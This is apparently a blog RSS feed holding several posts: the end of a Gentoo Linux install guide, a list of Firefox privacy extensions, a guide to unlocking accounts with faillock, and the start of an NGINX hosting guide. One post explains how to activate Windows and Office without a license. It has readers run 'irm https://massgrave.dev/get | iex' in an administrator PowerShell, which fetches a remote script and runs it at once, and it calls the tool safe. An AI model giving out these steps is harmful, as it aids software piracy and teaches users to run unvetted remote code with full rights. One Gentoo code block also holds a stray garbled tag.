Software licenses play a crucial role in Gentoo, as they determine which software can be installed based on your acceptance or rejection of these licenses. By default, Gentoo requires you to manually configure your license preferences. Here, we&apos;ll set up Gentoo to accept all licenses, but you can customize this based on your preferences.

### Edit make.conf

To customize your license acceptance preferences, you need to add a line to your `make.conf` file. You can do this using a single command or by manually editing the file.

#### Option 1: Adding the Line Automatically

Run the following command to add the necessary line to your `make.conf` file:

```shell
echo &apos;ACCEPT_LICENSE=&quot;*&quot;&apos; &gt;&gt; /etc/portage/make.conf
```

This command appends the line `ACCEPT_LICENSE=&quot;*&quot;` to your `make.conf` file, which indicates that you accept all licenses for packages. It allows you to install any software without being restricted by license agreements. However, please exercise caution and ensure that you comply with the licenses of the software you install, as some licenses may have specific requirements.

#### Option 2: Manual Editing

Alternatively, you can manually edit your `make.conf` file and add the following line:

```shell
ACCEPT_LICENSE=&quot;*&quot;
```

By setting `ACCEPT_LICENSE=&quot;*&quot;`, you configure Gentoo to accept all licenses, thereby enabling the installation of software without license-based restrictions.

Customizing your license acceptance preferences in Gentoo provides flexibility while also ensuring that you comply with software licenses. Make sure to choose the option that aligns with your licensing preferences and requirements.
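Accepting every license is convenient but very permissive. If you would rather allow only free software, Gentoo defines license groups that `make.conf` can reference with an `@` prefix; for example:

```shell
# Stricter alternative: reject everything, then re-allow only
# the licenses Gentoo classifies as free
ACCEPT_LICENSE=&quot;-* @FREE&quot;
```

Here `-*` first rejects all licenses, and `@FREE` then accepts the free-software license group.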

## Step 15: Time Zone Configuration

Configuring the correct time zone is essential for your system to maintain accurate time settings. Follow these steps to set up your time zone in Gentoo:

### List Available Time Zones

Begin by listing the available time zones to find the one that corresponds to your region. You can use the following command to list the available time zone files:

```shell
ls /usr/share/zoneinfo/
```

This command provides a list of available time zone files. You&apos;ll need to choose the one that represents your region.

### Set Time Zone

Once you&apos;ve identified the time zone file that matches your location, you can set your system&apos;s time zone by adding a line with the chosen time zone file path. For example, if your time zone is &quot;Asia/Taipei,&quot; use the following command:

```shell
echo &quot;Asia/Taipei&quot; &gt; /etc/timezone
```

&gt; Note: Replace &quot;Asia/Taipei&quot; with your own time zone, as listed under `/usr/share/zoneinfo/`.

This command specifies your preferred time zone, ensuring that your Gentoo system displays the correct local time.

### Configure Time Zone Data

To complete the time zone configuration, you need to configure the time zone data to align with your chosen time zone. Use the following command to perform this configuration:

```shell
emerge --config sys-libs/timezone-data
```

Running `emerge --config sys-libs/timezone-data` ensures that your system&apos;s time settings are accurate and synchronized with your selected time zone.
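As a quick, optional sanity check, you can print the current time with its zone abbreviation; it should match the zone you just configured (Asia/Taipei is the example used above):

```shell
# Current local time with the zone abbreviation:
date +&quot;%Y-%m-%d %H:%M %Z&quot;

# Preview any zone without touching system settings:
TZ=&quot;Asia/Taipei&quot; date +%Z
```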

## Step 16: Locale Configuration

Configuring the correct locale settings is crucial for defining your system&apos;s language and regional preferences. Follow these steps to set up your locale configuration in Gentoo:

### Edit locale.gen

1. **Uncomment Locale Settings:** Begin by uncommenting the locale settings that match your preferred language and regional settings. Use a text editor to open the `locale.gen` file, for example:

    ```shell
    nano /etc/locale.gen
    ```

    Within the `locale.gen` file, you can enable the desired locales by removing the `#` symbol in front of them. Locales define language and regional settings.

### Generate Locales

2. **Generate Locales:** After you&apos;ve uncommented and saved the changes to the `locale.gen` file, you can generate the specified locales using the following command:

    ```shell
    locale-gen
    ```

    Running `locale-gen` generates the locales that you specified in the `locale.gen` file. These locales support different languages and regional settings, allowing you to configure your system for multiple languages if needed.

### List Available Language Options

3. **List Available Language Options:** To verify that the desired locales have been successfully generated, you can list the available language options using the following command:

    ```shell
    eselect locale list
    ```

    The `eselect locale list` command provides you with a list of available locales, helping you confirm that your system can support your chosen language and region.

### Set Default Locale

4. **Set Default Locale:** To set the default locale for your system, use the `eselect locale set` command followed by the number associated with your preferred locale. For example, to set the default locale to &quot;en_US.utf8,&quot; you might use:

    ```shell
    eselect locale set 6
    ```

    The exact locale number may vary depending on your system&apos;s available options. Adjust this setting according to your language and regional preferences.

### Update Environment Variables

5. **Update Environment Variables:** Finally, update the environment variables and apply the changes to the system&apos;s locale settings with the following commands:

    ```shell
    source /etc/profile
    env-update
    ```

    Running `source /etc/profile` ensures that the changes to the locale settings take effect. It&apos;s an essential step to make sure your system correctly uses the specified language and regional settings.

By following these steps, you can customize your Gentoo system&apos;s language and regional settings, tailoring it to your specific language preferences and requirements.

#### `env-update`

In Gentoo Linux, the `env-update` command plays a vital role in synchronizing system settings configured in various files with the actual runtime environment of your system. It ensures that changes made to important configuration files are immediately reflected in the environment, enabling the system to function correctly based on the updated settings.

Here&apos;s how `env-update` works:

1. **Configuration File Inspection:** `env-update` scans critical configuration files across your Gentoo system. These files contain essential system-wide settings, such as locales, paths, and various variables that influence system behavior.

2. **Environment Variable Update:** Based on the information gathered from the configuration files, `env-update` takes action to update the environment variables of the system. These environment variables are essential as they dictate how processes and applications should behave.

3. **Instantaneous Impact:** One of the key benefits of `env-update` is that it enacts changes instantly. There&apos;s no need to reboot your system or log in and out for the updates to take effect. This means that the updated settings become immediately available to all processes and users on the system.

To illustrate its importance, consider the locale configuration discussed earlier. After configuring locales in Gentoo, running `env-update` ensures that your chosen language and regional settings are consistently applied across all applications and processes without any delay.

In summary, `env-update` serves as a critical bridge between the static configuration files and the dynamic runtime environment of Gentoo Linux. Its role is fundamental in maintaining system-wide consistency and facilitating the swift application of system-wide changes.

## Step 17: Firmware and Kernel

This step involves installing essential firmware and the Gentoo kernel to ensure proper hardware support and system functionality.

### Install Firmware

1. **Install Firmware Packages:**

   ```shell
   emerge --ask sys-kernel/linux-firmware
   ```

   Start by installing the necessary firmware packages required for effective hardware support. These packages provide essential firmware files for various hardware components.

2. **Intel CPU Microcode (Optional):**

   ```shell
   emerge --ask sys-firmware/intel-microcode
   ```

   If you have an Intel CPU, consider installing Intel microcode updates. These updates enhance CPU performance and security by addressing microcode vulnerabilities. Ensure that your CPU is supported before installing this package.

### Install Gentoo Kernel

3. **Install Gentoo Kernel:**

   ```shell
   emerge --ask sys-kernel/gentoo-kernel
   ```

   Install the Gentoo kernel, a critical component of your Gentoo Linux system. The kernel serves as the core of the operating system, providing essential hardware support and system functionality.

4. **List Available Kernels:**

   ```shell
   eselect kernel list
   ```

   List the available kernels to help you select the appropriate one for your system. This step is crucial to ensure that you choose the correct kernel configuration that matches your hardware and requirements.

Installing firmware and the Gentoo kernel is vital for the proper functioning of your Gentoo Linux system, ensuring that it&apos;s equipped with the necessary hardware support and system core.

## Step 18: Filesystem Configuration

In this step, you will configure your filesystem by editing the `/etc/fstab` file, which contains information about how various partitions are mounted and used by your system.

### Edit /etc/fstab

Open the `/etc/fstab` file for editing using a text editor, such as Nano:

```shell
nano /etc/fstab
```

Inside the `/etc/fstab` file, add entries for different partitions based on your system configuration. Here&apos;s an example of what the entries might look like:

```shell
# EFI Partition
/dev/vda1   /efi        vfat    defaults    0 2

# Swap Partition
/dev/vda2   none        swap    sw          0 0

# Root Partition
/dev/vda3   /           btrfs   defaults,noatime  0 1
```

Here&apos;s an explanation of each entry:

1. `/dev/vda1` is mounted at `/efi` and uses the VFAT filesystem.
2. `/dev/vda2` is designated as a swap partition.
3. `/dev/vda3` is mounted as the root directory and uses the Btrfs filesystem. It also specifies mount options, such as &quot;defaults&quot; and &quot;noatime.&quot;

Ensure that you adjust these entries to match your actual disk partitioning and filesystem choices. Properly configuring `/etc/fstab` is essential for ensuring that your system mounts and utilizes partitions correctly during startup and operation.
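Device names such as `/dev/vda3` can change if disks are added or reordered. As a more robust, optional alternative, fstab entries can reference filesystem UUIDs instead; the UUID below is a placeholder, so substitute the value `blkid` reports for your partition:

```shell
# List each partition and its filesystem UUID (run as root):
blkid

# Example fstab line using UUID= instead of a device node
# (placeholder UUID; use your own from the blkid output):
# UUID=1234-ABCD   /efi   vfat   defaults   0 2
```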

## Step 19: Setting Network Information

In this step, you will configure network-related settings to ensure proper communication and connectivity on your Gentoo Linux system. Each command provided is independent of the others.

### Edit the Hosts File

```shell
nano /etc/hosts
```

- `nano /etc/hosts`: Use this command to open and edit the `/etc/hosts` file. This file is responsible for mapping hostnames to IP addresses and is crucial for network communication.

Add the following lines to the file:

```shell
127.0.0.1   gentoo   localhost
::1         localhost
```

These lines define the loopback address (`127.0.0.1`) and the IPv6 loopback address (`::1`) with corresponding hostnames. The &quot;gentoo&quot; hostname is associated with the loopback address.

### Set the Hostname

```shell
echo gentoo &gt; /etc/hostname
```

- `echo gentoo &gt; /etc/hostname`: Use this command to set the hostname of your Gentoo system. In this example, the hostname is set to &quot;gentoo.&quot; Make sure to replace &quot;gentoo&quot; with your desired hostname if needed.

### Install and Configure DHCP

```shell
emerge --ask net-misc/dhcpcd
```

- `emerge --ask net-misc/dhcpcd`: This command installs `dhcpcd`, a DHCP (Dynamic Host Configuration Protocol) client, which is essential for automatically configuring network interfaces.

```shell
rc-update add dhcpcd default
```

- `rc-update add dhcpcd default`: Add `dhcpcd` to the list of services that start automatically at boot. This ensures that the DHCP client service runs during system startup, enabling automatic network configuration.

```shell
rc-service dhcpcd start
```

- `rc-service dhcpcd start`: Use this command to start the `dhcpcd` service immediately. It will configure network interfaces and establish network connectivity.
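To confirm that the client is actually running and registered to start at boot, OpenRC can report both:

```shell
# Check the current state of the service:
rc-service dhcpcd status

# Verify it appears in the default runlevel:
rc-update show default | grep dhcpcd
</imports>
```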

By following these steps, you&apos;ve configured network-related settings on your Gentoo Linux system, including hostname setup, host file editing, and the installation and configuration of a DHCP client for automatic network configuration. Your system should now be ready to communicate over the network.

## Step 20: Network Configuration

Configuring your network correctly is essential for proper system functionality. Follow these steps to configure your network interfaces in Gentoo:

### Identify Network Interfaces

Use the following command to identify the names of available network interfaces on your system, including both active and inactive interfaces:

```shell
ifconfig -a
```

This command will display a list of network interfaces, helping you determine the correct interface name that you need for configuration.
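Note that `ifconfig` comes from the older net-tools package and may not be present on a minimal install. The iproute2 equivalent, which is typically available, lists all interfaces as well:

```shell
ip link show
```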

### Configure Network Interfaces

Edit the network interface configurations in the `/etc/conf.d/net` file to suit your specific network requirements. You can use a text editor like Nano for this purpose:

```shell
nano /etc/conf.d/net
```

Inside the `/etc/conf.d/net` file, configure your network interfaces as needed. For example, you can set up DHCP for your Ethernet interface or configure static IP addresses. Here&apos;s an example configuration for DHCP:

```shell
config_enp1s0=&quot;dhcp&quot;
```

Replace &quot;enp1s0&quot; with the actual name of your network interface. Adjust the configuration based on your network setup.

### Create a Symbolic Link

Navigate to the `/etc/init.d/` directory, which is used for managing system services:

```shell
cd /etc/init.d/
```

Create a symbolic link for your network interface, simplifying its management:

```shell
ln -s net.lo net.enp1s0
```

Replace &quot;enp1s0&quot; with the actual name of your network interface.

### Start Network Interface at Boot

Ensure that the network interface starts automatically with the system by adding it to the default runlevel:

```shell
rc-update add net.enp1s0 default
```

Make sure to replace &quot;enp1s0&quot; with the correct interface name for your system configuration.

By following these steps, you&apos;ll properly configure your network interfaces in Gentoo, ensuring that they start automatically and provide stable connectivity for your system.

## Step 21: Setting the Root Password

Securing your Gentoo system starts with setting a strong and secure root password. The root account is a powerful administrative account that should only be accessed by authorized users when necessary. Follow these steps to set the root password:

### Set Root Password

To set a secure root password, use the `passwd` command:

```shell
passwd
```

After entering this command, you&apos;ll be prompted to enter and confirm your new root password. Make sure to choose a password that is both strong and memorable. A strong password typically includes a combination of uppercase and lowercase letters, numbers, and special characters. It&apos;s important to keep this password confidential and not share it with unauthorized users.

Setting a strong root password is a critical security measure for your Gentoo system, as it helps protect your system from unauthorized access and ensures that only trusted users can perform administrative tasks.

## Step 22: File System Support

To effectively manage various filesystems on your Gentoo system, it&apos;s important to have the necessary tools and utilities installed. This step focuses on installing `sys-fs/btrfs-progs` and `sys-fs/dosfstools` to support the Btrfs and FAT filesystems, respectively. Follow these instructions to ensure you have the required filesystem support:

### Install Btrfs Tools

[Btrfs](https://btrfs.readthedocs.io/en/latest/) is a modern and feature-rich filesystem that offers benefits like snapshots and data integrity. To manage Btrfs filesystems on your Gentoo system, you&apos;ll need the `btrfs-progs` package. Use the following command to install it:

```shell
emerge -av sys-fs/btrfs-progs
```

This command will install the Btrfs tools, enabling you to create, manage, and maintain Btrfs filesystems on your Gentoo installation.

### Install FAT Tools

FAT (File Allocation Table) is a filesystem format commonly used for removable storage devices such as USB drives and SD cards, and for the EFI system partition. To work with FAT filesystems on your Gentoo system, you&apos;ll need the `dosfstools` package. Use the following command to install it:

```shell
emerge -av sys-fs/dosfstools
```

Installing `dosfstools` provides utilities like `mkfs.fat` for formatting FAT filesystems and `fsck.fat` for checking and repairing them.
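As an illustration of the installed tools (do not reformat the EFI partition you created earlier; `mkfs.fat` destroys existing data):

```shell
# Non-destructive check of an existing FAT filesystem
# (-n answers &quot;no&quot; to all repair prompts, so nothing is changed):
fsck.fat -n /dev/vda1

# For reference only: creating a fresh FAT32 filesystem on a
# hypothetical partition (replace /dev/vdXN with a real device):
# mkfs.fat -F 32 /dev/vdXN
```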

With both `sys-fs/btrfs-progs` and `sys-fs/dosfstools` installed, your Gentoo system will have comprehensive filesystem support, allowing you to work with a variety of filesystem formats as needed. This flexibility is essential for managing data on different storage devices and maintaining the integrity of your files.

## Step 23: Configuring the GRUB Bootloader

Configuring the GRUB bootloader is a crucial step in setting up your Gentoo Linux system for booting. GRUB (GRand Unified Bootloader) is responsible for managing the boot process and allows you to choose which operating system to start. In this step, we&apos;ll configure and install GRUB for your Gentoo installation.

### Edit make.conf for GRUB

First, we need to specify the GRUB platform as &quot;efi-64&quot; in your `make.conf` file. This is essential for systems that use EFI for booting. To do this, execute the following command:

```shell
echo &apos;GRUB_PLATFORMS=&quot;efi-64&quot;&apos; &gt;&gt; /etc/portage/make.conf
```

This command appends the `GRUB_PLATFORMS` setting to your `make.conf` file, ensuring that GRUB is configured correctly for EFI booting.

### Install GRUB

Now that we&apos;ve configured GRUB, we need to install it on your system. Use the following command to install the GRUB bootloader:

```shell
emerge --ask --verbose sys-boot/grub
```

This command tells Gentoo&apos;s package manager, Portage, to install the `sys-boot/grub` package, which includes the GRUB bootloader.

#### Install GRUB to the EFI Partition

To ensure that your system can boot using the UEFI firmware, we&apos;ll install GRUB to the EFI partition. Use the following command to accomplish this:

```shell
grub-install --target=x86_64-efi --efi-directory=/efi
```

This command installs GRUB for the x86_64 EFI target architecture and specifies the EFI directory as `/efi`. It ensures that the necessary GRUB files are placed in the EFI partition, making them accessible to the UEFI firmware during the boot process.
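Optionally, you can confirm that the EFI binaries actually landed on the ESP; the exact directory name under `/efi/EFI` depends on the bootloader ID GRUB was installed with:

```shell
ls -R /efi/EFI
```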

#### Generate the GRUB Configuration File

The final step in configuring GRUB is to generate the GRUB configuration file, `grub.cfg`. This file contains the menu entries and settings required for booting into your Gentoo installation. Use the following command to generate the configuration file:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

This command creates the `grub.cfg` file in the `/boot/grub` directory. It detects the installed operating systems and generates a boot menu based on the available options.

With these configurations and tools in place, your Gentoo Linux system is well-prepared for use. The GRUB bootloader is set up to handle the boot process, allowing you to select Gentoo Linux or other operating systems when you start your computer. You&apos;re now ready to finalize the installation and configure your user account.

## Step 24: Unmounting Partitions

As you near the completion of your Gentoo Linux installation, it&apos;s essential to unmount the various partitions and directories associated with the installation process. This ensures that your system is prepared for a clean and successful reboot.

```shell
exit
cd ~
```

### Unmounting Specific Directories

To begin, unmount specific directories within the Gentoo installation by executing the following command:

```shell
umount -l /mnt/gentoo/dev{/shm,/pts,}
```

- `umount -l /mnt/gentoo/dev{/shm,/pts,}`: This command unmounts several directories within the Gentoo installation, including `/dev`, `/dev/shm`, and `/dev/pts`. Unmounting these directories is essential to detach them from the installation environment.

### Unmounting the Entire Gentoo Installation

Next, unmount the entire Gentoo installation from the `/mnt/gentoo` directory using the following command:

```shell
umount -R /mnt/gentoo
```

- `umount -R /mnt/gentoo`: This command recursively unmounts all filesystems and directories within the `/mnt/gentoo` directory. It ensures that every component of the Gentoo installation is properly detached from the system.

## Step 25: Reboot Your System

With all the necessary unmounting completed, it&apos;s time to reboot your system to initiate the use of the newly installed Gentoo Linux.

```shell
reboot
```

- `reboot`: Execute this command to reboot your system gracefully. After the reboot, you&apos;ll encounter the GRUB menu, which allows you to select your desired operating system. Use the arrow keys to highlight &quot;Gentoo&quot; and then press Enter to boot into your freshly installed Gentoo Linux system.

Rebooting is the final step in the installation process, and once your system restarts, you&apos;ll have access to your new Gentoo Linux environment. Congratulations on successfully installing Gentoo!

![Grub has been installed!](./grub-done.png)

## Final Step: Testing Your System

Congratulations! You&apos;ve successfully installed Gentoo Linux, and now it&apos;s time to test your system to ensure everything is working as expected.

### Log in to your system

Once your system has rebooted, you should see the login prompt. Log in using the username and password you configured during the installation process.

![login](./login.png)

## Conclusion

Congratulations! You&apos;ve successfully installed Gentoo Linux using the OpenRC init system. This installation process, although detailed, provides you with a highly customizable and optimized Linux system tailored to your specific needs.

Throughout this comprehensive guide, you&apos;ve learned how to:

1. Set up the initial environment and prerequisites.
2. Create and format partitions.
3. Set up the system clock and download the Stage3 tarball.
4. Configure important files like `make.conf` and `/etc/fstab`.
5. Set the hostname and configure network settings.
6. Install essential software and firmware.
7. Configure the bootloader (GRUB for UEFI systems).

Gentoo Linux&apos;s source-based package management system, Portage, allows you to fine-tune your system to your liking and keep it up to date. While the installation process may be intricate, the result is a highly customizable and efficient Linux distribution that can be tailored to your specific use cases.

## What next?

Time to install your window manager and desktop environment. Follow our guide here:

- [Gentoo Open-RC: Install XORG and xfce]

### Next Level?

It&apos;s time to give Linux From Scratch (LFS) a shot! If Gentoo represents a high-level installation process and Arch falls into the intermediate category, LFS takes it to an entirely different level. This is a full-fledged installation of Linux from scratch, starting from ground zero.

Become a Linux master!

![LFS](https://heshambahram.com/wp-content/uploads/2018/06/Linux-From-Scratch-1024x652.jpg)

### What I want to say

Installing Gentoo for the first time was quite an experience. It wasn&apos;t particularly difficult to set up, but what did catch me off guard was the extensive compilation process that spanned over half a day. Personally, I have a preference for compiling over using pre-built packages, but it really comes down to your own preferences.

However, one thing that stands out about this distribution is its perfection, especially for those well-versed in Linux. For the average user, though, it might not be the first choice. I&apos;d like to highlight that installing Gentoo is quite time-consuming. To put it in perspective, while you can have Arch Linux up and running in about 10 minutes, Gentoo will easily take you half a day to get everything set up. It&apos;s a labor of love for sure.

Finally I want to say:

```shell
btw i use Arch and Gentoo!
```

-- Arch &amp; Gentoo user

## References

- [Ultimate guide to installing Gentoo Linux for new users](https://onion.tube/watch?v=_50MJv4Dc40)
- [Gentoo AMD64 Handbook](https://wiki.gentoo.org/wiki/Handbook:AMD64)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Block annoying Malicious Code for any website</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-protect/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-protect/</guid><description>This guide introduces a selection of powerful browser extensions that can help you fortify your online traffic and surf the web with peace of mind.</description><pubDate>Fri, 15 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

This guide introduces a selection of powerful browser extensions that can help you fortify your online traffic and surf the web with peace of mind. These extensions are designed to enhance your browsing security, protect your online traffic, and shield you from unwanted tracking and ads.

### [uBlock Origin](https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/)

uBlock Origin is a lightweight ad-blocker that efficiently blocks ads, pop-ups, and trackers, providing you with a cleaner and faster browsing experience. It also offers advanced features such as element blocking and custom blacklists and more.

See the source code on [GitHub](https://github.com/gorhill/uBlock).

![uBlock Origin](https://addons.mozilla.org/user-media/previews/thumbs/238/238548.jpg?modified=1622132423)

### [Privacy Badger](https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/)

Developed by the EFF, Privacy Badger is a robust privacy tool that blocks invisible trackers, providing you with a safer and more secure browsing experience. It automatically learns to block invisible trackers over time, safeguarding your online privacy.

See the source code on [GitHub](https://github.com/EFForg/privacybadger).

![Privacy Badger](https://addons.mozilla.org/user-media/previews/full/171/171793.png?modified=1622132342)

### [Decentraleyes](https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/)

Decentraleyes is a privacy tool that protects you from tracking by serving common CDN resources locally, reducing the need for external requests and enhancing your browsing speed and privacy.

See the source code on [GitHub](https://git.synz.io/Synzvato/decentraleyes).

![Decentraleyes](https://addons.mozilla.org/user-media/previews/thumbs/137/137406.jpg?modified=1622132453)

### [DuckDuckGo Privacy Essentials](https://addons.mozilla.org/en-US/firefox/addon/duckduckgo-for-firefox/)

DuckDuckGo Privacy Essentials is a comprehensive privacy tool that blocks trackers, enforces encryption, and provides a privacy grade for each website you visit.

See the source code on [GitHub](https://github.com/duckduckgo/duckduckgo-privacy-extension).

![DuckDuckGo Privacy Essentials](https://addons.mozilla.org/user-media/previews/full/307/307998.png?modified=1730489460)

### [NoScript](https://addons.mozilla.org/en-US/firefox/addon/noscript/)

NoScript is a powerful security tool that blocks JavaScript, Java, Flash, and other potentially harmful content, protecting you from malicious scripts and attacks such as cross-site scripting (XSS) and clickjacking.

See the source code on [GitHub](https://github.com/hackademix/noscript).

![NoScript](https://addons.mozilla.org/user-media/previews/full/267/267408.png?modified=1668722455)

### [ClearURLs](https://addons.mozilla.org/en-US/firefox/addon/clearurls/)

ClearURLs is designed to strip tracking elements from URLs, safeguarding your privacy by preventing unnecessary tracking.

See the source code on [GitHub](https://github.com/ClearURLs/Addon).

![ClearURLs](https://addons.mozilla.org/user-media/previews/thumbs/231/231733.jpg?modified=1640781132)

### [Cookie AutoDelete](https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/)

Cookie AutoDelete is a privacy tool that automatically deletes cookies from closed tabs. Cookies should not stick around forever, and this extension helps you manage them effectively so they can&apos;t track you across the web.

See the source code on [GitHub](https://github.com/Cookie-AutoDelete/Cookie-AutoDelete).

![Cookie AutoDelete](https://addons.mozilla.org/user-media/previews/full/189/189656.png?modified=1622132671)

### [Facebook Container](https://addons.mozilla.org/en-US/firefox/addon/facebook-container/)

Facebook Container isolates your online activity from Facebook, preventing the social media giant from tracking your web browsing behavior.

See the source code on [GitHub](https://github.com/mozilla/contain-facebook).

![Facebook Container](https://addons.mozilla.org/user-media/previews/full/235/235581.png?modified=1622133081)

### [Popup Blocker](https://addons.mozilla.org/en-US/firefox/addon/popup-blocker/)

Popup Blocker is a simple yet effective tool that blocks annoying pop-ups. Sites that are notorious for pop-up ads, such as adult sites, are exactly what this extension helps you block :)

See the source code on [GitHub](https://github.com/schomery/popup-blocker).

![Popup Blocker](https://addons.mozilla.org/user-media/previews/thumbs/179/179585.jpg?modified=1622132611)

## Conclusion

These browser extensions can block the trackers and ads that try to follow you around the web, helping to protect you while you browse.

Do you feel it&apos;s absurd that you have to spend more than a hundred dollars to buy Windows, and you don&apos;t understand why you still have to watch Windows&apos; built-in advertisements after buying it? This article will teach you how to use the [Microsoft Activation Scripts (MAS)](https://github.com/massgravel/Microsoft-Activation-Scripts) tool to activate Windows without installing any third-party unknown software.

In addition, [Microsoft Activation Scripts (MAS)](https://github.com/massgravel/Microsoft-Activation-Scripts) can activate Office and all Windows versions.

## Getting Started: Activating Windows

1. Open PowerShell as administrator

2. Type the following command to execute a script from the URL:

```powershell
irm https://massgrave.dev/get | iex
```

3. You will see the options menu on your terminal screen. Type `2` for KMS38 / Windows, which will activate your Windows until the year 2038.

![](https://massgrave.dev/MAS_AIO.png)

4. Wait for the activation to finish; it will show &quot;Press any key to go back&quot;.

5. That&apos;s all! Your Windows has been successfully activated.

## How about Office?

Do you want to use Office 365 too? One problem is that you need to download the installation files to activate it. Don&apos;t worry! [MAS](https://massgrave.dev/) has collected the official installation media on its website, [click here](https://massgrave.dev/genuine-installation-media.html)!

1. Download the Office files:
Click the link above, choose the mirror you want, download and install Office, then open the MAS script again.

2. Again, open PowerShell as administrator

3. Type the following command to execute a script from the URL:

```powershell
irm https://massgrave.dev/get | iex
```

4. You will see the options menu on the terminal screen. Enter &quot;3&quot; for Office/Windows and select Office. Then wait a moment, and your Office will be activated for 180 days.

&gt;Note: After 180 days you will need to activate again.

![](https://massgrave.dev/MAS_AIO.png)

5. That&apos;s all! Your Office has been successfully activated.

## Conclusion

With MAS, a fully open-source and safe tool, you no longer have to worry about buying a Windows key or paying an annual fee to activate Office.

Linux systems include robust security mechanisms. One such mechanism is designed to protect against unauthorized access by temporarily locking out a user after too many failed login attempts. While this feature enhances security, there may be situations where you need to manually unlock a user account. In this guide, we&apos;ll explore how to unlock a Linux user account using the `faillock` command.

## Why Would You Need to Unlock a User Account?

Before we delve into the process, let&apos;s understand why you might need to unlock a user account:

1. **Accidental Lockout**: Users can sometimes forget their passwords or make multiple login attempts with incorrect credentials, resulting in a lockout.

2. **Maintenance**: During system maintenance or troubleshooting, you might need to unlock an account to regain access.

3. **Security Measures**: While account lockouts are security features, there could be cases where you want to manually control account access, such as when you believe an account is locked unjustly or prematurely.

## Using `faillock` to Unlock a User Account

The `faillock` command is a useful tool for managing user account lockouts. It provides a straightforward way to view and reset failed login attempts and unlock user accounts. Here&apos;s how to use it:

### 1. Check the Current Status

Before proceeding, it&apos;s a good idea to check the current status of the user account you want to unlock. Use the following command, replacing `username` with the actual username:

```bash
faillock --user username
```

This command will display the current status, including the number of failed attempts and whether the account is locked.
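For a user with recent failures, the output looks roughly like this (the timestamps and source address here are illustrative):

```plaintext
username:
When                Type  Source                                           Valid
2023-09-10 12:01:12 RHOST 192.168.1.50                                         V
2023-09-10 12:01:30 RHOST 192.168.1.50                                         V
```

Each line is one failed attempt; the `Valid` column marks records that still count toward the lockout threshold.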

### 2. Unlock the User Account

To unlock a user account, you can use the `faillock` command with the `--reset` option. Again, replace `username` with the actual username:

```bash
faillock --user username --reset
```

This command will reset the failed login attempts for the specified user and unlock the account if it was locked.

### 3. Verify the Status

After resetting the account, you can recheck its status to ensure that it&apos;s no longer locked:

```bash
faillock --user username
```

The output should indicate that the user&apos;s account is no longer locked and that there have been no recent failed login attempts.

## All-User Options

The `faillock` command offers various options for managing user accounts and failed login attempts. Here are some actions you can perform:

- **Display All User Accounts:** To see the status of all user accounts with failed login attempts, use the command without specifying a username:

  ```bash
  faillock
  ```

- **Unlock All Accounts:** To unlock all locked user accounts, use the following command:

  ```bash
  faillock --reset
  ```

- **Configure Lockout Policy:** The lockout threshold itself is not set with `faillock` flags; it is configured through the `pam_faillock` module, typically in `/etc/security/faillock.conf`, as described below.

## Optional Lockout Threshold Configuration

For added security, you can tune the lockout threshold, which determines how many failed login attempts are allowed before an account is locked. These settings are not `faillock` command-line options; they live in `/etc/security/faillock.conf`, which is read by the `pam_faillock` module:

- `deny`: the number of consecutive failed attempts before the account is locked.
- `unlock_time`: how long, in seconds, the account stays locked before it is automatically unlocked.
- `fail_interval`: the window, in seconds, within which failures are counted as consecutive.

For example, to set a 30-minute lockout period after three failed login attempts, put the following in `/etc/security/faillock.conf`:

```conf
deny = 3
unlock_time = 1800
```

This configuration ensures that the user account is locked for 30 minutes after three consecutive failed login attempts.

### Nice Example

To lock a user account for 10 minutes after 10 consecutive failed login attempts, use the following settings in `/etc/security/faillock.conf`:

```conf
deny = 10
unlock_time = 600
```

In this configuration:

- `deny = 10` allows up to 10 failed attempts before the account is locked.
- `unlock_time = 600` keeps the account locked for 600 seconds (10 minutes).

The new policy applies to subsequent login attempts; an existing lockout can still be cleared at any time with `faillock --user username --reset`.

## Conclusion

Linux provides robust security features to protect user accounts, including the ability to lock accounts temporarily after too many failed login attempts. By understanding how to use the `faillock` command, you can easily inspect and reset failed login attempts and unlock a Linux user account (resetting another user&apos;s records typically requires root privileges). This knowledge empowers you to maintain the security of your Linux system effectively.

## Reference

- [How to unlock linux user after too many failed login attempts](https://superuser.com/questions/1597162/how-to-unlock-linux-user-after-too-many-failed-login-attempts)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Host a Website and Configure SSL with Self-Signed TLS, Cloudflare and NGINX</title><link>https://ummit.dev//posts/linux/tools/nginx/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/nginx/</guid><description>Learn how to set up NGINX on a Linux VPS, host a website, and secure it with SSL using a self-signed TLS certificate through Cloudflare. Follow our step-by-step guide to ensure your website is up and running securely.</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of web servers, NGINX stands out as a powerful and efficient choice for hosting websites and web applications. Whether you&apos;re running a personal blog, a small business website, or a complex web application, NGINX is a versatile tool that can handle the job with ease. In this blog post, we&apos;ll walk you through the process of setting up NGINX on a Linux VPS, hosting a website, and securing it with SSL using a self-signed TLS certificate through Cloudflare.

## Step 1: Provision a Linux VPS

Before you can set up NGINX, you&apos;ll need a virtual private server (VPS) running a Linux distribution of your choice. Popular options include Ubuntu, CentOS, and Debian. You can choose a VPS provider like DigitalOcean, Linode, or AWS to provision your server.

## Step 2: Connect to Your VPS

Once your VPS is up and running, you&apos;ll need to connect to it using SSH. Open your terminal and use the following command to connect to your VPS:

```bash
ssh username@your_server_ip
```

Replace `username` with your server&apos;s username and `your_server_ip` with the actual IP address of your VPS.

## Step 3: Update Your System

It&apos;s essential to keep your server&apos;s software up to date for security and stability. Run the following commands to update your server:

```bash
sudo apt update
sudo apt upgrade
```

Replace `apt` with `yum` if you&apos;re using CentOS.

## Step 4: Install NGINX

Installing NGINX on Linux is straightforward. Use the package manager for your distribution to install NGINX. For Ubuntu, you can run:

```bash
sudo apt install nginx
```

For CentOS:

```bash
sudo yum install nginx
```

## Step 5: Start NGINX and Enable Auto-Start on Boot

After installation, start NGINX and enable it to start automatically on boot:

```bash
sudo systemctl start nginx
sudo systemctl enable nginx
```

### Allow Nginx Full in Firewall

